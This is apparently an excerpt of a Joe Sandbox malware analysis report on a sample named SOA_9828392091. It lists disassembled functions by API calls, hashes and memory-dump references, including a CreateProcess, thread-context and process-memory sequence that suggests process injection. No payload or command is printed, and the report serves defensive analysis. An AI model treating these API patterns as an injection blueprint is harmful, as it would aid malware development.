                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                      • String ID:
                                      • API String ID: 2800547568-0
                                      • Opcode ID: 34ff6a79c7ab93343b6f7eef87e11151c520a1060c64869dda9b48490c210fd7
                                      • Instruction ID: 6a53efa84b344c1d1df560472a5d0471374e9293a14d3f12362fb65b7f9569b5
                                      • Opcode Fuzzy Hash: 34ff6a79c7ab93343b6f7eef87e11151c520a1060c64869dda9b48490c210fd7
                                      • Instruction Fuzzy Hash: CCF09031802204AAD712EB67880776EBBA46F81376F65C50CEC24AB2C1CB7C8B0D9B55
                                      Function 018B8725 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 018B8F55
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018B8F79
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018B8F9B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                      • Instruction ID: c5ea3092bfb2aa123360da275f88fb550ceb39639acc819174af304adeb05027
                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                      • Instruction Fuzzy Hash: 5212CD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                      Function 00952957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      • __flush.LIBCMT ref: 00952A0B
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __flush__getptd_noexit
                                      • String ID:
                                      • API String ID: 4101623367-0
                                      • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                      • Instruction ID: d3a8e9344ce0b87410412158b620f5beb64ac6d58e7334deb2f26bc86f991187
                                      • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                      • Instruction Fuzzy Hash: DC4195717007069FDF28CF6BC99156E77AAAF86362F24852DEC55C7280E770DD498B40
                                      Function 0094ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: eaac72872ee29b091d17b6d18ee4b1f4b0123d723b0290a0cf2416d5a905961c
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: 3231C274E00105DBD718DF58C490A69FBAAFF49340F648AA5E40ACB2A6DB35EDC1CB90
                                      Function 009A9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: fda3f6ff58b69b4040b75105815c820d3690be552287fce4e5cb58b36d3d1e6d
                                      • Instruction ID: 9c60d7fc086ff74dd435832c3df3109b5a309e415b07aaae0b8b9ad0860118fc
                                      • Opcode Fuzzy Hash: fda3f6ff58b69b4040b75105815c820d3690be552287fce4e5cb58b36d3d1e6d
                                      • Instruction Fuzzy Hash: 13411C745087518FDB24DF14C484F1ABBE1BF85308F1989ACE99A4B362C776E885CF52
                                      Function 0095ED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit
                                      • String ID:
                                      • API String ID: 3074181302-0
                                      • Opcode ID: 252ba21d71ae9431a5fe7132b834822ec65030238f3575eab9ebf8c56dd3fb53
                                      • Instruction ID: 99d2a0182e03ba8e8ecc3a0e467ba87d360d545093a179fac85084d0eeca264b
                                      • Opcode Fuzzy Hash: 252ba21d71ae9431a5fe7132b834822ec65030238f3575eab9ebf8c56dd3fb53
                                      • Instruction Fuzzy Hash: 84216FB28196448BD716FFAADC4635876655FC2337F260640FC704B2E2DBB58E089BA1
                                      Function 009341A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00934214: FreeLibrary.KERNEL32(00000000,?), ref: 00934247
                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009339FE,?,00000001), ref: 009341DB
                                        • Part of subcall function 00934291: FreeLibrary.KERNEL32(00000000), ref: 009342C4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Library$Free$Load
                                      • String ID:
                                      • API String ID: 2391024519-0
                                      • Opcode ID: ec5344e43c1b2c5f8d61e0fee77d3b6f07e806c3ab6df93fb31331d4cbf5b8e3
                                      • Instruction ID: cba7e8a085143752a8b1e119f54c2b8cb0eb129548bb8f491cf4ff1cde807795
                                      • Opcode Fuzzy Hash: ec5344e43c1b2c5f8d61e0fee77d3b6f07e806c3ab6df93fb31331d4cbf5b8e3
                                      • Instruction Fuzzy Hash: FD11A731600306AADF10BF74DD06F9E77A99FC0700F118429F5A6B61C1DA74AA149F60
                                      Function 009A9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 19a45b6fe8451db669c60c5691a79c47fbe6f36a71998be4fcf8f835b9508a11
                                      • Instruction ID: 240ba1ed1a081a65e5028681b7f0e3fa6e1051c8962e4f980702ceb7029d2b88
                                      • Opcode Fuzzy Hash: 19a45b6fe8451db669c60c5691a79c47fbe6f36a71998be4fcf8f835b9508a11
                                      • Instruction Fuzzy Hash: A821F370908701CFDB24DF68C544F2ABBE1BF85304F154968FA9A4B262D731E849CF92
                                      Function 0095AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___lock_fhandle.LIBCMT ref: 0095AFC0
                                        • Part of subcall function 00957BDA: __getptd_noexit.LIBCMT ref: 00957BDA
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit$___lock_fhandle
                                      • String ID:
                                      • API String ID: 1144279405-0
                                      • Opcode ID: 54056ef2596856897532ce9501a21d4cd39187ff9c961d8081d760cdb38ac83f
                                      • Instruction ID: 599d974412a8e087edeb899a8459386968ab387baf356d874dd3c4d1ae50e6c7
                                      • Opcode Fuzzy Hash: 54056ef2596856897532ce9501a21d4cd39187ff9c961d8081d760cdb38ac83f
                                      • Instruction Fuzzy Hash: 001160728096109BD712EFB6D84276DB6609FC2333F294740EC741B2E2D7B48E489BA1
                                      Function 009339DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                      • Instruction ID: 87303fb27fa66ec5aa40a5b987f42f3514381368789d611426ac3b10c1b5741b
                                      • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                      • Instruction Fuzzy Hash: 8A01447150010DAFCF05EFA4C8929FFBB78EF61344F10C069B566A71A5EA30AA49DF60
                                      Function 00952AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                      Download Yara Rule
                                      APIs
                                      • __lock_file.LIBCMT ref: 00952AED
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2597487223-0
                                      • Opcode ID: c8ada2da89ef3f48311210fce18ad7302d13700878553bfa6ec3eaefb7d90de8
                                      • Instruction ID: e3171fdfba6f7c494f5fe8ba3995a86e06d29845c47e509741bf08d31bfec1ae
                                      • Opcode Fuzzy Hash: c8ada2da89ef3f48311210fce18ad7302d13700878553bfa6ec3eaefb7d90de8
                                      • Instruction Fuzzy Hash: 8EF06D31900205AADF22EFB7CC0679F3AA9BF82326F158415BC149B1D1D7788A6ADB51
                                      Function 00934252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,?,?,009339FE,?,00000001), ref: 00934286
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 53afa0e594a6c5e020d465e3ab4530c1a2da24e793d9891e535d03a57fbf11e9
                                      • Instruction ID: edd5cc0e768618c5100e31ea753d4f6a519e62b3a382e230712f369562aa30a2
                                      • Opcode Fuzzy Hash: 53afa0e594a6c5e020d465e3ab4530c1a2da24e793d9891e535d03a57fbf11e9
                                      • Instruction Fuzzy Hash: 2DF0A070409301CFCB348F64D480813BBE4BF003253218A3EF1E692510C376A840DF40
                                      Function 009340A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009340C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      • Opcode ID: da649e56e11e4978074e445b5ba8fa0cadf8158d3b504d7cefd22bdd0abdb831
                                      • Instruction ID: 9ee3049a95212cef2cb6df9bbcb7b0f54ceecb667795ae8b47e5ff17f1cba766
                                      • Opcode Fuzzy Hash: da649e56e11e4978074e445b5ba8fa0cadf8158d3b504d7cefd22bdd0abdb831
                                      • Instruction Fuzzy Hash: 7DE0C2366042246BC711E658CC46FEA77ADDFC87B0F0941B5FA09E7244EA64A9819A90
                                      Function 0097BCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID:
                                      • API String ID: 2638373210-0
                                      • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                      • Instruction ID: 97b51dd3216416c3ba8595d37dd92cd86bbf88aca3089235f04b05e528202ae4
                                      • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                      • Instruction Fuzzy Hash: 92E092B1204B009BD7388A24D800BE373E4EB05305F00481CF69A83241EB627841C759
                                      Function 018B9728 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 018B9739
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 3ad9369ada3cbbf37556422015bd42b3670b58866997a084c2658f5e62e0e129
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 33E0E67494010DDFDB00DFB4D5496DD7BF4EF04301F100161FD01D2280D6309E509A62

                                      Non-executed Functions

                                      Function 0099F7FF Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0099F87D
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0099F8DC
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0099F919
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0099F940
                                      • SendMessageW.USER32 ref: 0099F966
                                      • _wcsncpy.LIBCMT ref: 0099F9D2
                                      • GetKeyState.USER32(00000011), ref: 0099F9F3
                                      • GetKeyState.USER32(00000009), ref: 0099FA00
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0099FA16
                                      • GetKeyState.USER32(00000010), ref: 0099FA20
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0099FA4F
                                      • SendMessageW.USER32 ref: 0099FA72
                                      • SendMessageW.USER32(?,00001030,?,0099E059), ref: 0099FB6F
                                      • SetCapture.USER32(?), ref: 0099FB9F
                                      • ClientToScreen.USER32(?,?), ref: 0099FC03
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0099FC29
                                      • ReleaseCapture.USER32 ref: 0099FC34
                                      • GetCursorPos.USER32(?), ref: 0099FC69
                                      • ScreenToClient.USER32(?,?), ref: 0099FC76
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0099FCD8
                                      • SendMessageW.USER32 ref: 0099FD02
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0099FD41
                                      • SendMessageW.USER32 ref: 0099FD6C
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0099FD84
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0099FD8F
                                      • GetCursorPos.USER32(?), ref: 0099FDB0
                                      • ScreenToClient.USER32(?,?), ref: 0099FDBD
                                      • GetParent.USER32(?), ref: 0099FDD9
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0099FE3F
                                      • SendMessageW.USER32 ref: 0099FE6F
                                      • ClientToScreen.USER32(?,?), ref: 0099FEC5
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0099FEF1
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0099FF19
                                      • SendMessageW.USER32 ref: 0099FF3C
                                      • ClientToScreen.USER32(?,?), ref: 0099FF86
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0099FFB6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 009A004B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3461372671-4164748364
                                      • Opcode ID: c4bc0f7934581d4afc7175783c20db62a10f3203ab2efb646d64c9b04cca5248
                                      • Instruction ID: fdeb42540a22e0f2285f53c2b85c092eee7b9ca405355c5c265c25a5bf3b0c68
                                      • Opcode Fuzzy Hash: c4bc0f7934581d4afc7175783c20db62a10f3203ab2efb646d64c9b04cca5248
                                      • Instruction Fuzzy Hash: 4032CD70608345EFDB20CF68C894BAABBA8FF49354F140A29F696C72A1D771DC44DB51
                                      Function 0099AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0099B1CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
